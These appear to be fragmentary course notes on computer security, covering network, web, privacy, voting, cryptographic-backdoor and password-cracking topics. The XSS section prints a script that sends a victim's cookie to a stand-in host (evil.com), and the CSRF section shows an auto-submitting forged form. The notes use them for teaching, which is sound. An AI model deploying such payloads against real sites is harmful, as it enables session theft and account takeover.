• suppose the RSA private key is (d, N); make shares (d_1, N), (d_2, N), (d_3, N) such that
  d_1 + d_2 + d_3 = d mod (p−1)(q−1). Then
  X^{d_1} · X^{d_2} · X^{d_3} mod N = X^{(d_1+d_2+d_3) mod (p−1)(q−1)} mod N = X^d mod N
(splits up an RSA operation)
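A sketch of the additive k-way scheme above (modulus and values illustrative):

    import secrets

    M = 2**256                      # large modulus; the secret s satisfies 0 <= s < M

    def share(s: int, k: int) -> list:
        # k-way additive sharing: k-1 random shares, plus one that makes the sum equal s mod M
        shares = [secrets.randbelow(M) for _ in range(k - 1)]
        shares.append((s - sum(shares)) % M)
        return shares

    def reconstruct(shares: list) -> int:
        # all shares are required; any proper subset reveals nothing about s
        return sum(shares) % M

    shares = share(123456789, 3)
    assert reconstruct(shares) == 123456789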
10 Securing network infrastructure
Prefix Hijacking
How to defend?
Can crypto help? Remember that AS’s can lie about their own links and costs and
about what other nodes said. So, crypto can prevent lying about what neighbors said
but it can’t prevent lying about your own links.
Routing relies on trust
It is a different adversary model compared to application-layer security.
• small number of AS’s
• AS’s are well known
• and physically connected
• AS’s also don’t want to advertise shorter paths than reality because then they
will likely be overloaded with traffic and go down
All of the above are natural protection against attacks. It’s not an ideal setup, but it’s
not terrible either. Is there a much better way to design BGP if we were to do it over?
Unclear.
IP packet
These contain source and destination IP addresses. Can these things be spoofed?
• source IP? yes
• destination IP? no, that doesn’t even make sense
Nodes can only verify claimed source address back one hop; this is why IPs are spoofa-
ble. For example, DoS attacks spoof their return IP addresses.
Ingress/egress filtering
Egress filtering: discard an outgoing packet if its source IP is outside the local
network's address range. This protects against types of DoS where an adversary takes
over an internal computer and tries to send DoS packets with spoofed sources. It
protects the rest of the internet.
DDoS is easy if you have a lot of zombies
More difficult: DoS from a single machine with more traffic than the machine is capable
of sending. So the goal? Amplification of traffic volume.
Smurf attack
Attacker broadcasts an ECHO request with a spoofed source IP address (the victim's
IP address). All network hosts (broadcast recipients) hear the broadcast and respond.
Except they respond to the victim, who is overwhelmed with traffic.
DNS attacks
DNS: The system that takes a domain name and translates it into an IP address.
User requests example.com → recursive name server → root server → recursive name
server → TLD name servers → recursive name server → thousands of name servers
→ recursive name server → 192.168.31
Root servers
Requests are delivered to the root server who is closest and available.
Cache poisoning
In the words of Wikipedia: “DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain Name System (DNS) re-
solver’s cache, causing the name server to return an incorrect IP address, diverting
traffic to the attacker’s computer (or any other computer).”
Prevention: DNSSEC
11 Spam
Focus on email.
Scope of problem:
• Vast majority of email is spam (99+%)
• Lots is fraudulent (or inappropriate)
• 5% of US users have bought something from a spammer
The anonymity makes this attractive for certain kinds of products
• Spamming often pays (low cost to send, so need little success to profit)
Review: how email works
• Messages written in standard format
– Headers: To, From, Date, ...
– Body: can encode different media types in body
• Traditionally:
  sender's computer ──SMTP──→ sender's MTA ──SMTP──→ recipient's MTA ──IMAP──→ recipient's computer
  (MTA: Mail Transfer Agent)
• Webmail model:
  sender's computer ──HTTP(S)──→ sender's mail service ──SMTP──→ recipient's mail service ──HTTP(S)──→ recipient's computer
• More complexities:
– Forwarding
– Mailing lists
– Autoresponders
Economics of spam
Anti-spam strategies
Definition. Spam
1. Email the recipient doesn’t want to receive
Problems:
• Defined after the fact
• Legally problematic (anyone can say they didn’t want some message)
• Not what you want (just not wanting it doesn’t make it spam)
2. Unsolicited email
Problems:
• What does this mean? (May not explicitly have asked for a given email)
• Lots of unsolicited email is wanted
3. Unsolicited commercial email
Problems: less than in definition 2, but still the same issues
12 Web Security
Note: see piazza for lecture slides
Two sides of web security
1. browser side
2. web applications
• written in PHP, ASP, JSP, Ruby, etc.
• include attacks like sql injection
Some web threat models include passive or active network attackers, and malware
attackers, who control a user’s machine by getting them to download something.
Browser execution model:
1. Load content
2. Renders (processes html)
3. Responds to events
• User actions: onClick, onMouseover
• Rendering: onLoad
• Timing: setTimeout(), clearTimeout()
Javascript
There are three ways to include JavaScript in a webpage: inline <script>, in
a linked file <script src="something">, or in an event handler attribute <a
href="example.com" onmouseover="alert('hi')">
The script runs in a “sandbox” in the front end only.
Same-origin policy
Scripts that originate from the same SERVER, PROTOCOL, and PORT may access
each other/each other’s DOMS with no problem, but they cannot access another site’s
DOM. The exception to this is when you link js with a <script src="" >.
The user is able to grant privileges to signed scripts (UniversalBrowserRead/Write)
Frame and iFrame
A Frame is a rigid division. An iFrame is a floating inline frame. They provide
structure to the page and delegate screen area to content from another source (like
youtube embeds). The browser provides isolation between the frame and everything
else in the DOM.
Cookies
After a request, a server might do set-cookie: value. When the browser revisits
the page, it will GET ... cookie: value and the server responds based on that
cookie.
Cookies hold unique pseudorandom values and the server has a table of values. So,
cookies are often used alongside authentication. BUT it’s only safe to use cookie au-
thentication via HTTPS; otherwise, someone can read the “authenticator cookie”.
CSRF: Cross-Site Request Forgery
The same browser runs a script from a good site and a malicious script from a bad site.
Requests to the good site are authenticated by cookies. The malicious script can make
forged requests to the good site with the user’s cookie.
• Netflix: change account settings
• Gmail: steal contacts
• potential for much bigger damage (ie. banking)
How might this happen?
1. User establishes session with victimized server
2. User visits the attack server
3. User receives malicious page
<form action="victimized server page form">
<input> fields </input>
</form>
<script> document.forms[0].submit() </script>
4. the attack server sends a forged request to the victimized server via the user and this form
Login CSRF
Attacker sends request so that victim is logged in as attacker. Everything the victim
does gets recorded on the attacker’s account; or, if the victim is receiving incoming
payments/messages, the attacker will get them.
CSRF Defenses
To prevent login CSRF, you want strict referer validation and login forms sub-
mitted over HTTPS. HTTPS sites in general use strict referer validation. Other
sites use ROR or frameworks that implement this stuff for you.
• Custom HTTP header. X-Requested-By: XMLHttpRequest
Cross Site Scripting (XSS)
<frame src="naive.com/hello?name=
  <script>window.open('evil.com/steal.cgi?cookie=' + document.cookie)</script>
">
Then naive.com is opened and the script is executed, where the referer looks like
naive.com. The naive.com cookie is sent as a parameter in a request to evil.com, and
steal.cgi is executed with the cookie.
SQL injection
Defenses
• Input validation
Filter out apostrophes, semicolons, %, hyphens, underscores. Also check data
type (eg. make sure an integer field actually contains an int)
• Whitelisting
Generally better than blacklisting (like above) because
– you might forget to filter out certain characters
– blacklisting could prevent some valid input (like last name O’Brien)
– allowing only a well-defined set of safe values is simpler
• escape quotes
• use prepared statements
• Bind variables:
  ? placeholders are guaranteed to be treated as data and not as a control sequence
  (example below)
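A sketch of the prepared-statement / bind-variable approach using Python's built-in sqlite3 module (table and values illustrative):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('O''Brien', '42')")

    name = "x' OR '1'='1"   # attacker-controlled input

    # vulnerable pattern: string concatenation lets the input change the query's structure
    # conn.execute("SELECT secret FROM users WHERE name = '" + name + "'")   # returns every row

    # prepared statement: the ? placeholder is always treated as data, never as SQL
    rows = conn.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()
    print(rows)   # [] -- the injection attempt matches no user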
13 Web Privacy
Note: see piazza for lecture slides
Third parties
Third parties (ie. not the site you’re visiting), typically invisible, are compiling profiles
of your browsing history. There is an average of 64 tracking mechanisms (visible) on a
top 50 website, and possibly more invisible ones!
Why tracking?
Behavioral targeting: send info to ad networks so that user interests are targeted.
(Online advertising is a huge and complicated industry.)
Trackers include cookies, javascript, webbugs (1px gifs), where a third party domain is
getting your information.
The market for lemons
George Akerlof, 1970
”Why do people still visit websites that collect too much data?”
1. buyers/users can’t tell apart good and bad products
2. sellers/service providers lose incentive to provide quality (in the case of the in-
ternet, privacy)
3. the bad crowds out the good since bad products are more profitable
• intellectual privacy
• behavioral targeting
• price discrimination
• NSA eavesdropping!
Aliasing
You visit hi5.com, which loads content from the subdomain ad.hi5.com, but DNS aliases
ad.hi5.com to ad.yieldmanager.com. Your browser is tricked: this works even if you
block 3rd-party cookies.
Tagging
Definition. A server can set a flag in a user’s browser that says that a certain site
can only be accessed securely, through https
Fingerprinting
Pseudonymous: trackers can tell when the same person comes back but don't know their
real-life identity. (The Internet post-cookies.)
1. Third party is sometimes a first party: have first party relationship with social
networking sites but they’re also as widgets on other pages
Example: Facebook’s Like button – even if you don’t click it, Facebook knows
you were on that page
2. Leakage of identifiers:
GET http://ad.doubleclick.net/adj/...
Referer: http://submit.SPORTS.com/[email protected]
Cookie: id=35c192bcfe0000b1...
In Firefox, one can put the URL in a script tag; JavaScript throws an error which
includes the URL, giving "randomwalker" or another identity just from visiting this
random page.
Can embed invisible Google spreadsheet and look at “Viewing now” on another
machine– how to tell which of these users to serve what to? Use lots of different
spreadsheets. Assign users to a subset of 10 spreadsheets, and then chance of
overlap pretty low.
Defenses
1. Referer blocking
Two drawbacks: (1) many sites check referer headers as a CSRF defense; blocking all
referer headers will break websites.
14 Electronic voting
Requirements
• only authorized voters can vote
• ≤ 1 ballot per voter
• ballots counted as cast
• secret ballot; ”receipt-free” (cannot prove to 3rd party how you voted)
Logically, this involves two steps: (1) cast ballot into ballot box and (2) tally ballot
box to get result.
Old fashioned paper ballots are cheap to operate, easy to understand, but prob-
lematic if the ballot is long/complex. Trickery is possible too: for example, chain voting
is when "goons" fill out a ballot and coerce people to deposit that ballot into the box
and return the blank one to them; this repeats. There also needs to be a chain of custody
on the ballot box.
Example. Benaloh
Reencryption in El Gamal
• We see that r + r′ can decrypt the message! Also, these two ciphertexts are
indistinguishable!
How do we know the shuffler didn't cheat?
They start with a "ballot box" B (a sequence of encrypted ballots) and end with B′,
which should be equivalent (a reordering of reencryptions of B).
Proof protocol
• the prover produces B_1
• B_1 should be equivalent to B and B′
• the prover (shuffler) knows the correspondence between B and B_1, and also between
B_1 and B′
Note: if B is not equivalent to B′, then B_1 can't be equivalent to both
Fix? Introduce a trusted voting machine that the voter cannot manipulate; it encrypts
ballot and refuses to reveal r. But yet another problem: how do you know voting
machine protects integrity and confidentiality of ballot?
In summary
• PAPER: counting is slow and expensive; the voter sees the record directly; main threat: tampering afterwards
• ELECTRONIC: counting is fast and cheap; the voter does not see the record directly; main threat: tampering beforehand
• PAPER + ELECTRONIC RECORDS: the method of choice
Example: optical scan voting. The voter fills out a paper ballot and feeds it into a
scanner; the scanner records an electronic record, and the paper ballot drops into the
ballot box.
HYBRID COUNT
• count electronic records
• statistical audit for consistency of the paper records with the electronic records
• for sample of ballots, compare by hand
15 Backdoors in crypto standards
BACK DOOR
• presence is not obvious
• keyed backdoors vs. unkeyed backdoors
KEYED BACKDOORS: need a secret master key to access back door
UNKEYED BACKDOORS: not obvious, but you're just hoping that no one notices;
like a hidden door in real life
DUAL-EC
You “add” two EC points to get another EC point. Multiplying point by an int is the
same as adding it to itself repeatedly.
How it works
• Pick random, non-secret EC points P, Q
• start with a secret integer s_0
• to update and generate new output:
  s_i = x(s_{i−1}·P), where x(·) extracts the x coordinate
  output T(x(s_i·Q)), where T(·) truncates, discarding the 16 high-order bits
Problem 1
Adversary can create keyed backdoor if they can choose P and Q (see slides)
So then naturally the NSA chose P and Q.
How to generate P and Q?
• choose random seed
• use a one-way algorithm
• get P and Q
But what if adversary chooses the seed?
It should be okay as long as one-way algorithm is good, and the adversary can’t
understand the relationship between P and Q
Problem 2 Output bits are easily distinguished from random. NSA argued against
fixing this (a vulnerability)
(It’s overwhelmingly likely that NSA created a keyed backdoor into this standard by
choosing P and Q)
What happened: SSL/TLS is exploitable in practice. NIST's errors? Not insisting
on fixing vulnerabilities, resulting in a loss of trust in NIST.
The end-user was more vulnerable to NSA due to keyed backdoor and more vulnerable
to others due to the bias (unkeyed backdoor)
Net effect: semi-keyed backdoor
There are a lot of known insecure curves, and some curves that are probably secure,
but no one can prove it. Let’s also say that some adversary can break a fraction f of
the believed-good curves.
Backdoor-proof standardization
• Transparency
discussions on the record, rationale for decisions published
• Discretion is a problem! It gives adversary latitude.
eg. choice of technical approach, choice of mathematical structure, choice of
constants
• Use competitions, because negotiation in a standards committee is risky:
participants submit complete proposals; one is chosen by a group, and the
chosen proposal is adopted as-is or with absolutely clear improvements (this is
how AES was chosen)
Shared trust standards benefit everyone :)
20 Big data and privacy
Definition. Given two databases D and D0 , where D0 is D with your data removed,
anything an analyst can learn from D, they can also learn from D0
Theorem 20.1. Semantic privacy implies that the result of the analysis does not de-
pend on the contents of the dataset.
Differential privacy: a query Q is ε-DP if, for databases D_1, D_2 that differ in one
person's data, and for every set S of possible results,
Pr[Q(D_1) ∈ S] ≤ e^ε · Pr[Q(D_2) ∈ S]
Example. Counting queries: ‘‘How many items in the DB have the property _____?’’
To make results “non weird” (1) round off numbers to integers, (2) if a result is less
than 0, set it to 0, and (3) if a result is greater than a cap N , set it to N .
What about multiple queries and averaging?
Theorem 20.2. If Q is ε_1-DP and Q′ is ε_2-DP, then (Q(·), Q′(·)) is (ε_1 + ε_2)-DP.
(Essentially, you've added up how non-private the queries are.)
The implications? You can give an analyst an "ε budget" and let them decide how to
use it.
Generalizing beyond counting queries
If each element of the database can add/subtract at most some number V from the
results of the query, then we can generate noise from this distribution:
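A sketch of that noise addition for a counting query, including the rounding and capping described above (parameter values are illustrative):

    import random

    def laplace_noise(scale: float) -> float:
        # difference of two iid exponentials with mean `scale` is Laplace(0, scale)
        return random.expovariate(1 / scale) - random.expovariate(1 / scale)

    def dp_count(true_count: int, sensitivity: float, epsilon: float, cap: int) -> int:
        noisy = true_count + laplace_noise(sensitivity / epsilon)
        return max(0, min(cap, round(noisy)))   # round, floor at 0, cap at N ("non weird" results)

    print(dp_count(true_count=312, sensitivity=1, epsilon=0.1, cap=1000))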
Problems
Example. Artificial example: But what if there exists a book that only Ed would
buy?
“People who bought said book also bought Y”
Now you can easily extract information about what else Ed buys.
Example. Less artificial example: But what if there exists a rare book that you know
Ed bought?
“People who bought said book also bought Y”
Collaborative recommendations are still a clue about what Ed bought.
How to fix
21 Economics of Security
Does the market produce optimal security? To understand this question, we'll first
want to define what "optimal" means.
Definitions of Efficiency
Market Failures
Market failure #1: Negative Externalities
• In general, users will invest in reducing harm to themselves, but not to strangers
• Outcome is underinvestment in security, since the external harm doesn’t enter
into user’s cost/benefit calculation
• Breakdown in perfect bargaining, since the ”strangers” are unidentified and un-
able to invest to prevent the harm that falls on them
Market failure #2: Asymmetric Information
• Arises when vendors know more than users about the security of their products
• If it is hard for buyers to evaluate the security of products, then they won’t be
able to differentiate between high-quality and low-quality products
• As a result, users won’t pay more for supposedly high-quality products, so pro-
ducers won’t invest to develop more secure products, leading to underinvestment
in security
• Antidotes:
– Warranties: act as a signal of quality to buyers if companies willing to bear
the downside of security breaches
– Seller reputation: companies may be harmed in the long-run by selling poor
quality products due to damaged reputation
– Note: both of these solutions don't work well for start-ups, since the lifetimes
of these companies are short; thus warranties aren't very valuable and
seller reputation isn't a large concern
Network Effect:
• Some products tend to become more valuable the more people use it (e.g. search
engines)
• Markets for these products tend to be pushed towards monopoly
• Standardization can lead to positive network effect without monopoly
• Argument: network effect → monoculture
• Example: if all products use the same security protocol, it might be easier for bad
guys to break lots of systems by exploiting a vulnerability in that standard
• However, there are benefits to having a dominant producer of security:
– There are scale efficiencies in security, since large companies can amortize
investments over a large number of users
– Companies can also internalize some of the security benefits, if users harmed
(as in the Negative Externality scenario) fall within the same user base
Large customers tend to be able to protect themselves; for example, they can demand
that certain security features be implemented in a product. But what about individual
users?
Can market structures improve information flow? Insurance companies (i.e. that
offer insurance against security breaches) can aggregate the bargaining power of many
different customers. Certification programs, which would give products/companies cer-
tificates of quality, could lead to the same effect. Presumably, certified companies
would see more demand and be able to charge higher prices for their products. How-
ever, companies are unlikely to pay certification bodies to criticize their software.
Can we change liability rules? An optimal liability rule: costs should be borne by
whoever can best prevent harm.
22 Human Factors in Security
A common mistake when designing security software is to "design for yourself." There
are many different kinds of users, and their needs will probably vary over time, so
designing software for the use of a knowledgeable developer is probably a misguided
approach.
Some researchers presented ”average users” with a PGP mail client, and asked them
to perform tasks that required encryption (e.g. send a secure email to Alice, set up a
new secure communication with Charlie). The goals were to observe a) how they use
it and b) what mistakes they make.
The study revealed that average users experienced LOTS of usability problems and
made LOTS of security errors. Why?
• UI design mistakes (e.g. hard to find something in a dropdown menu)
• Metaphor mismatch
– e.g. RSA key was visualized with a physical key icon
– but a cryptographic key isn’t much like a physical key
– why would a user want to publish their key? (as they do with the public
key) why are there two keys (public and private)?
– one suggestion: ”ciphertext is a locked chest” (not a perfect analogy)
• User has to do lots of work up front, before communicating at all
– have to first generate a key pair
– this is the point in the process where users understand the least, and are
most eager to send a message
This case study raises the question about what role the user should play in a secure
procedure. Should they
• control a mechanism? (e.g. ”block cookies” on a browser)
• use a tool? (e.g. ”clear history” on a browser, which performs many tasks like
clearing cache)
• state a goal?
The goal for many systems is a ”naturally secure interface.” One example here is the
camera light on a laptop that is intended to light up whenever camera is in use.
• user obtains protection against being secretly recorded
• however, on Macs, this light can be bypassed by re-programming firmware that
links camera and light
• a better solution would be to build in a hardware interlock between camera and
light
Case study: an organization that recruits volunteers to break the law in order to put
political pressure on issues. Organizations like this have a strong incentive to encrypt,
since their threat model includes an adversary (government) with a large amount of
resources.
Warning messages
Warning messages are often used to preempt security breaches. However, users can
suffer from ”dialogue fatigue” and either click through important warnings or find
workarounds.
Countermeasures:
• Vary design of dialogue
• Make "No" the default (so the user can't just hit enter to click through)
NEAT/SPRUCE Framework
23 Quantum Computing
Classical Bits
Multi-qubit systems:
• In a classical system with k bits, the possible states of the system are
|(every k-bit string)⟩, of which there are 2^k
• In a quantum system, the possible states are Σ_{i=0}^{2^k−1} α_i · |s_i⟩, where s_i is
the ith k-bit string, such that Σ_{i=0}^{2^k−1} |α_i|^2 = 1
• Measuring the system forces it into the classical state |s_i⟩ with probability |α_i|^2
• In principle, operations on the multi-qubit system include any unitary matrix
• In practice, we use a few simple gates
• Computation:
– initial state = |(input)00000⟩ (the input is padded with zeros to some fixed length)
– perform some preprogrammed set of gates
– measure system to produce output
– goal is for the system to collapse to the ”correct” answer with high proba-
bility upon measurement
Can we build a quantum computer? Right now, we can only build small ones, but there
is reason to believe we will be able to construct larger ones in the future.
Advantages of QC
There is a common but wrong view that quantum computers will be able to solve any
problem in NP efficiently (i.e. in polynomial time). The idea here is that you can put
a quantum computer into a state which is a superposition of all the possible solutions,
and then measure to determine the ”correct” answer. In reality, decreasing the coef-
ficients on incorrect answers and increasing the coefficient on correct answer(s) isn’t
always easy.
What we know:
• for general NP-hard problems, classical computers require brute-force search
(takes O(2^n) time)
• Grover's algorithm ⟹ quantum computers can solve these problems in O(2^{n/2}),
a dramatic improvement but still super-polynomial
• there exist some such problems which quantum computers can solve efficiently
– factoring (via Shor’s algorithm)
– discrete log problem (via a variant of Shor’s algorithm)
• in a world with large quantum computers, protocols that rely on the hardness of
factoring and the discrete log problem are useless (including RSA, Diffie-Hellman,
etc)
• most symmetric crypto (e.g. AES) is not efficiently breakable (it only falls within
the domain of Grover's algorithm)
• Grover's algorithm implies that we can break AES with a 128-bit key in
2^{128/2} = 2^{64} steps
• Solution: double the key size
• are there public key algorithms that are not breakable fast by quantum comput-
ers? probably
Quantum Key Exchange
• Threat model:
– quantum channel between Alice and Bob
– assume there exists an eavesdropper who a) can measure but b) cannot
modify qubits in the channel without measuring
• 1) before sending, Alice flips a coin; if heads, she applies R to the bit before sending
• 2) when Bob gets a bit, he flips a coin: if heads, he applies R^{-1} to the bit before measuring
• 3) Alice and Bob publish their coin flips, and discard any bits where the flips don't match
• 4) Alice picks half of the remaining bits, at random, and Alice and Bob publish
their values for these bits
– if any fail to match, abort the protocol (eavesdropper was measuring)
– otherwise, use the remaining bits as a shared secret (this exchange is simulated
in the sketch at the end of this section)
• The adversary has a decision: which bits, if any, should he measure?
• If adversary measures:
– if Alice flipped tails, gets correct value
– if Alice flipped heads, get correct value with probability 50%
– If Alice flipped heads and Bob applied R^{-1}, then there is a 50% chance
Bob's bit won't match Alice's
– Overall, if the adversary measures, there is a 25% chance that Bob’s bit
won’t match alice’s (chance that Alice flipped heads times chance bit col-
lapsed to the wrong value during adversary’s measurement)
• The adversary might also try to apply R^{-1} before measuring; in this case, he
runs the risk of disrupting bits that were in the classical state to begin with
• Problem: the adversary needs to guess Alice's coin flip to measure the bit without
disturbing it
– if the adversary modifies more than 4 of the check bits, they will get caught
with greater than 50% probability
– if the adversary measures a lot, it is likely that the integrity check will fail
– if the adversary doesn't measure a lot, Alice and Bob will have a larger
shared secret
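A small classical simulation of the exchange above, with no eavesdropper present, treating each qubit as a 2-vector of amplitudes; modeling R as a 45-degree rotation is an assumption, since R's definition is not reproduced in these notes:

    import math, random, secrets

    C = math.cos(math.pi / 4); S = math.sin(math.pi / 4)

    def R(state):                   # the rotation applied by Alice on heads
        a, b = state
        return (C * a - S * b, S * a + C * b)

    def R_inv(state):               # the inverse rotation applied by Bob on heads
        a, b = state
        return (C * a + S * b, -S * a + C * b)

    def measure(state):             # collapse to 0 or 1 with probability |amplitude|^2
        a, _ = state
        return 0 if random.random() < a * a else 1

    n = 64
    alice_bits  = [secrets.randbelow(2) for _ in range(n)]
    alice_coins = [secrets.randbelow(2) for _ in range(n)]
    qubits = []
    for bit, coin in zip(alice_bits, alice_coins):
        state = (1.0, 0.0) if bit == 0 else (0.0, 1.0)
        qubits.append(R(state) if coin else state)          # step 1

    # (an eavesdropper measuring here would disturb the rotated qubits and later fail the check)

    bob_coins = [secrets.randbelow(2) for _ in range(n)]
    bob_bits = []
    for state, coin in zip(qubits, bob_coins):
        if coin:
            state = R_inv(state)                            # step 2
        bob_bits.append(measure(state))

    # step 3: keep only positions where the coin flips match; those bits agree
    keep = [i for i in range(n) if alice_coins[i] == bob_coins[i]]
    assert all(alice_bits[i] == bob_bits[i] for i in keep)
    # step 4 (not shown): publish half of the kept bits to check for an eavesdropper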
24 Password Cracking
Elementary Methods
First, try to define and reduce the search space for a brute-force search:
• all short strings
• combinations of dictionary words
• dictionary words + common modifications (special characters, exclamation point
at the end)
• leaked passwords from past breaches
• dictionary words and one-character modifications
Properties of brute-force search:
• Time requirement: ∼ |D|, where |D| is the length of the dictionary
• Space: ∼ 1
• Can speed up the process by pre-computing hashes of all possible passwords in
search space:
– Fill hash table: can then find x ∈ D given H(x)
– Time to build: ∼ |D|
– Space: ∼ |D|
– Time to recover: ∼ 1
• What we want: smaller data structure, but still fast lookup =⇒ Rainbow Tables
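A sketch contrasting the two approaches above (wordlist and hash choice illustrative; real attacks use much larger dictionaries):

    import hashlib

    def H(pw: str) -> str:
        # unsalted hash of the password, as assumed by precomputation attacks
        return hashlib.sha256(pw.encode()).hexdigest()

    dictionary = ["password", "letmein", "hunter2", "password1"]   # stand-in for a real wordlist D

    # brute force: ~|D| time per target hash, ~constant space
    def crack_bruteforce(target: str):
        return next((pw for pw in dictionary if H(pw) == target), None)

    # precomputed table: ~|D| time and space to build, then ~constant time per target hash
    table = {H(pw): pw for pw in dictionary}
    def crack_precomputed(target: str):
        return table.get(target)

    print(crack_bruteforce(H("hunter2")), crack_precomputed(H("letmein")))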
Rainbow Tables